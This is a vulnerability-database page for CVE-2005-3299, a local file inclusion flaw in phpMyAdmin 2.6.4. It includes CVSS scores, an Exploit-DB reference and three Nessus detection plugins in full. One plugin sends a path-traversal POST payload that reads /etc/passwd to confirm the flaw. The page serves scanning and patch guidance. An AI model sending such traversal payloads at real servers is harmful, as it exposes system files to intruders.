Vulnerabilities > CVE-2005-3299 - Local File Include vulnerability in PHPmyadmin 2.6.4/2.6.4Pl1

047910
CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
NONE
Integrity impact
PARTIAL
Availability impact
NONE
network
low complexity
phpmyadmin
nessus
exploit available

Summary

PHP file inclusion vulnerability in grab_globals.lib.php in phpMyAdmin 2.6.4 and 2.6.4-pl1 allows remote attackers to include local files via the $__redirect parameter, possibly involving the subform array.

Vulnerable Configurations

Part Description Count
Application
Phpmyadmin
2

Exploit-Db

descriptionphpMyAdmin 2.6.4-pl1 Remote Directory Traversal Exploit. CVE-2005-3299. Webapps exploit for php platform
idEDB-ID:1244
last seen2016-01-31
modified2005-10-10
published2005-10-10
reportercXIb8O3
sourcehttps://www.exploit-db.com/download/1244/
titlephpMyAdmin 2.6.4-pl1 - Remote Directory Traversal Exploit

Nessus

  • NASL familyCGI abuses
    NASL idPHPMYADMIN_USESUBFORM_FILE_INCLUDES.NASL
    descriptionThe version of phpMyAdmin installed on the remote host allows attackers to read and possibly execute code from arbitrary files on the local host because of its failure to sanitize the parameter
    last seen2020-06-01
    modified2020-06-02
    plugin id19950
    published2005-10-11
    reporterThis script is Copyright (C) 2005-2018 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/19950
    titlephpMyAdmin grab_globals.lib.php subform Parameter Traversal Local File Inclusion
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(19950);
      script_version("1.19");
      script_cvs_date("Date: 2018/07/24 18:56:10");
    
      script_cve_id("CVE-2005-3299");
      script_bugtraq_id(15053);
    
      script_name(english:"phpMyAdmin grab_globals.lib.php subform Parameter Traversal Local File Inclusion");
      script_summary(english:"Checks for subform file inclusion vulnerability in phpMyAdmin");
     
      script_set_attribute(attribute:"synopsis", value:
    "The remote web server contains a PHP application that is prone to a
    local file inclusion flaw." );
      script_set_attribute(attribute:"description", value:
    "The version of phpMyAdmin installed on the remote host allows
    attackers to read and possibly execute code from arbitrary files on
    the local host because of its failure to sanitize the parameter
    'subform' before using it in the 'libraries/grab_globals.lib.php'
    script." );
      script_set_attribute(attribute:"see_also", value:"http://securityreason.com/achievement_securityalert/24" );
      script_set_attribute(attribute:"see_also", value:"http://www.phpmyadmin.net/home_page/security.php?issue=PMASA-2005-4" );
      script_set_attribute(attribute:"solution", value:
    "Upgrade to phpMyAdmin 2.6.4-pl2 or later." );
      script_set_cvss_base_vector("CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P");
      script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
      script_set_attribute(attribute:"exploit_available", value:"false");
      script_set_attribute(attribute:"plugin_publication_date", value: "2005/10/11");
      script_set_attribute(attribute:"vuln_publication_date", value: "2005/10/10");
      script_set_attribute(attribute:"plugin_type", value:"remote");
      script_set_attribute(attribute:"cpe", value:"cpe:/a:phpmyadmin:phpmyadmin");
      script_end_attributes();
    
      script_category(ACT_ATTACK);
      script_family(english:"CGI abuses");
      script_copyright(english:"This script is Copyright (C) 2005-2018 and is owned by Tenable, Inc. or an Affiliate thereof.");
    
      script_dependencies("phpMyAdmin_detect.nasl");
      script_exclude_keys("Settings/disable_cgi_scanning");
      script_require_ports("Services/www", 80);
      script_require_keys("www/phpMyAdmin", "www/PHP");
      exit(0);
    }
    
    
    include("global_settings.inc");
    include("misc_func.inc");
    include("http.inc");
    include("data_protection.inc");
    
    port = get_http_port(default:80, php: 1);
    
    
    # Test an install.
    install = get_kb_item(string("www/", port, "/phpMyAdmin"));
    if (isnull(install)) exit(0);
    matches = eregmatch(string:install, pattern:"^(.+) under (/.*)$");
    if (!isnull(matches)) {
      ver = matches[1];
      dir = matches[2];
    
      # Make sure an affected script exists.
      res = http_get_cache(item:string(dir, "/index.php"), port:port, exit_on_fail: 1);
    
      # If it does...
      if (egrep(pattern:'<link rel="stylesheet" [^>]+/phpmyadmin\\.css\\.php', string:res)) {
        # Try to exploit the flaw to read a file.
        postdata = string(
          "usesubform[1]=1&",
          "subform[1][redirect]=../../../../../../../../../etc/passwd"
        );
        r = http_send_recv3(method:"POST", item: string(dir, "/index.php?plugin=", SCRIPT_NAME), version: 11,
          exit_on_fail: 1, content_type:"application/x-www-form-urlencoded",
          data: postdata, port:port);
        res = r[2];
        # There's a problem if there's an entry for root.
        if (egrep(string:res, pattern:"root:.*:0:[01]:")) {
          if (report_verbosity > 0) {
            res = data_protection::redact_etc_passwd(output:res);
            security_warning(port: port, extra: res);
          }
          else
            security_warning(port:port);
    
          exit(0);
        }
      }
      # Check the version number in case open_basedir is restricting access.
      if ( ( report_paranoia > 1 ) && (ver =~ "^([01]\.|2\.([0-5]\.|6\.([0-3]|4($|.*pl1))))") ) {
         security_warning(port:port, extra: "
    ***** Nessus has determined the vulnerability exists on the remote
    ***** host simply by looking at the version number of phpMyAdmin
    ***** installed there.
    ");
      }
    }
    
  • NASL familyFreeBSD Local Security Checks
    NASL idFREEBSD_PKG_9B7053FD3AB511DA948400123FFE8333.NASL
    descriptionA phpMyAdmin security announcement reports : In libraries/grab_globals.lib.php, the $__redirect parameter was not correctly validated, opening the door to a local file inclusion attack. We consider this vulnerability to be serious.
    last seen2020-06-01
    modified2020-06-02
    plugin id21484
    published2006-05-13
    reporterThis script is Copyright (C) 2006-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/21484
    titleFreeBSD : phpmyadmin -- local file inclusion vulnerability (9b7053fd-3ab5-11da-9484-00123ffe8333)
    code
    #%NASL_MIN_LEVEL 80502
    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were  
    # extracted from the FreeBSD VuXML database :
    #
    # Copyright 2003-2018 Jacques Vidrine and contributors
    #
    # Redistribution and use in source (VuXML) and 'compiled' forms (SGML,
    # HTML, PDF, PostScript, RTF and so forth) with or without modification,
    # are permitted provided that the following conditions are met:
    # 1. Redistributions of source code (VuXML) must retain the above
    #    copyright notice, this list of conditions and the following
    #    disclaimer as the first lines of this file unmodified.
    # 2. Redistributions in compiled form (transformed to other DTDs,
    #    published online in any format, converted to PDF, PostScript,
    #    RTF and other formats) must reproduce the above copyright
    #    notice, this list of conditions and the following disclaimer
    #    in the documentation and/or other materials provided with the
    #    distribution.
    # 
    # THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS "AS IS"
    # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
    # THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
    # PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS
    # BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
    # OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
    # OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR
    # BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
    # WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
    # OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,
    # EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(21484);
      script_version("1.24");
      script_cvs_date("Date: 2019/08/02 13:32:37");
    
      script_cve_id("CVE-2005-3299");
      script_bugtraq_id(15053);
    
      script_name(english:"FreeBSD : phpmyadmin -- local file inclusion vulnerability (9b7053fd-3ab5-11da-9484-00123ffe8333)");
      script_summary(english:"Checks for updated package in pkg_info output");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:"The remote FreeBSD host is missing a security-related update."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "A phpMyAdmin security announcement reports :
    
    In libraries/grab_globals.lib.php, the $__redirect parameter was not
    correctly validated, opening the door to a local file inclusion
    attack.
    
    We consider this vulnerability to be serious."
      );
      # http://marc.theaimsgroup.com/?l=bugtraq&m=112907764728209
      script_set_attribute(
        attribute:"see_also",
        value:"https://marc.info/?l=bugtraq&m=112907764728209"
      );
      # http://www.phpmyadmin.net/home_page/security.php?issue=PMASA-2005-4
      script_set_attribute(
        attribute:"see_also",
        value:"https://www.phpmyadmin.net/security/PMASA-2005-4/"
      );
      # https://vuxml.freebsd.org/freebsd/9b7053fd-3ab5-11da-9484-00123ffe8333.html
      script_set_attribute(
        attribute:"see_also",
        value:"http://www.nessus.org/u?91ad6c57"
      );
      script_set_attribute(attribute:"solution", value:"Update the affected package.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N");
      script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:ND");
      script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
      script_set_attribute(attribute:"exploit_available", value:"true");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:freebsd:freebsd:phpMyAdmin");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:freebsd:freebsd");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2005/10/11");
      script_set_attribute(attribute:"patch_publication_date", value:"2005/10/11");
      script_set_attribute(attribute:"plugin_publication_date", value:"2006/05/13");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2006-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
      script_family(english:"FreeBSD Local Security Checks");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/FreeBSD/release", "Host/FreeBSD/pkg_info");
    
      exit(0);
    }
    
    
    include("audit.inc");
    include("freebsd_package.inc");
    
    
    if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    if (!get_kb_item("Host/FreeBSD/release")) audit(AUDIT_OS_NOT, "FreeBSD");
    if (!get_kb_item("Host/FreeBSD/pkg_info")) audit(AUDIT_PACKAGE_LIST_MISSING);
    
    
    flag = 0;
    
    if (pkg_test(save_report:TRUE, pkg:"phpMyAdmin>=2.6.4.r1<=2.6.4.1")) flag++;
    
    if (flag)
    {
      if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());
      else security_warning(0);
      exit(0);
    }
    else audit(AUDIT_HOST_NOT, "affected");
    
  • NASL familyGentoo Local Security Checks
    NASL idGENTOO_GLSA-200510-16.NASL
    descriptionThe remote host is affected by the vulnerability described in GLSA-200510-16 (phpMyAdmin: Local file inclusion vulnerability) Maksymilian Arciemowicz reported that in libraries/grab_globals.lib.php, the $__redirect parameter was not correctly validated. Systems running PHP in safe mode are not affected. Impact : A local attacker may exploit this vulnerability by sending malicious requests, causing the execution of arbitrary code with the rights of the user running the web server. Workaround : Run PHP in safe mode.
    last seen2020-06-01
    modified2020-06-02
    plugin id20036
    published2005-10-19
    reporterThis script is Copyright (C) 2005-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/20036
    titleGLSA-200510-16 : phpMyAdmin: Local file inclusion vulnerability
    code
    #%NASL_MIN_LEVEL 80502
    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were
    # extracted from Gentoo Linux Security Advisory GLSA 200510-16.
    #
    # The advisory text is Copyright (C) 2001-2018 Gentoo Foundation, Inc.
    # and licensed under the Creative Commons - Attribution / Share Alike 
    # license. See http://creativecommons.org/licenses/by-sa/3.0/
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(20036);
      script_version("1.14");
      script_cvs_date("Date: 2019/08/02 13:32:42");
    
      script_cve_id("CVE-2005-3299");
      script_xref(name:"GLSA", value:"200510-16");
    
      script_name(english:"GLSA-200510-16 : phpMyAdmin: Local file inclusion vulnerability");
      script_summary(english:"Checks for updated package(s) in /var/db/pkg");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:
    "The remote Gentoo host is missing one or more security-related
    patches."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "The remote host is affected by the vulnerability described in GLSA-200510-16
    (phpMyAdmin: Local file inclusion vulnerability)
    
        Maksymilian Arciemowicz reported that in
        libraries/grab_globals.lib.php, the $__redirect parameter was not
        correctly validated. Systems running PHP in safe mode are not affected.
      
    Impact :
    
        A local attacker may exploit this vulnerability by sending malicious
        requests, causing the execution of arbitrary code with the rights of
        the user running the web server.
      
    Workaround :
    
        Run PHP in safe mode."
      );
      # http://www.phpmyadmin.net/home_page/security.php?issue=PMASA-2005-4
      script_set_attribute(
        attribute:"see_also",
        value:"https://www.phpmyadmin.net/security/PMASA-2005-4/"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://security.gentoo.org/glsa/200510-16"
      );
      script_set_attribute(
        attribute:"solution", 
        value:
    "All phpMyAdmin users should upgrade to the latest version:
        # emerge --sync
        # emerge --ask --oneshot --verbose '>=dev-db/phpmyadmin-2.6.4_p2'"
      );
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:gentoo:linux:phpmyadmin");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:gentoo:linux");
    
      script_set_attribute(attribute:"patch_publication_date", value:"2005/10/17");
      script_set_attribute(attribute:"plugin_publication_date", value:"2005/10/19");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2005-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
      script_family(english:"Gentoo Local Security Checks");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/Gentoo/release", "Host/Gentoo/qpkg-list");
    
      exit(0);
    }
    
    
    include("audit.inc");
    include("global_settings.inc");
    include("qpkg.inc");
    
    if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    if (!get_kb_item("Host/Gentoo/release")) audit(AUDIT_OS_NOT, "Gentoo");
    if (!get_kb_item("Host/Gentoo/qpkg-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
    
    
    flag = 0;
    
    if (qpkg_check(package:"dev-db/phpmyadmin", unaffected:make_list("ge 2.6.4_p2"), vulnerable:make_list("lt 2.6.4_p2"))) flag++;
    
    if (flag)
    {
      if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());
      else security_warning(0);
      exit(0);
    }
    else
    {
      tested = qpkg_tests_get();
      if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
      else audit(AUDIT_PACKAGE_NOT_INSTALLED, "phpMyAdmin");
    }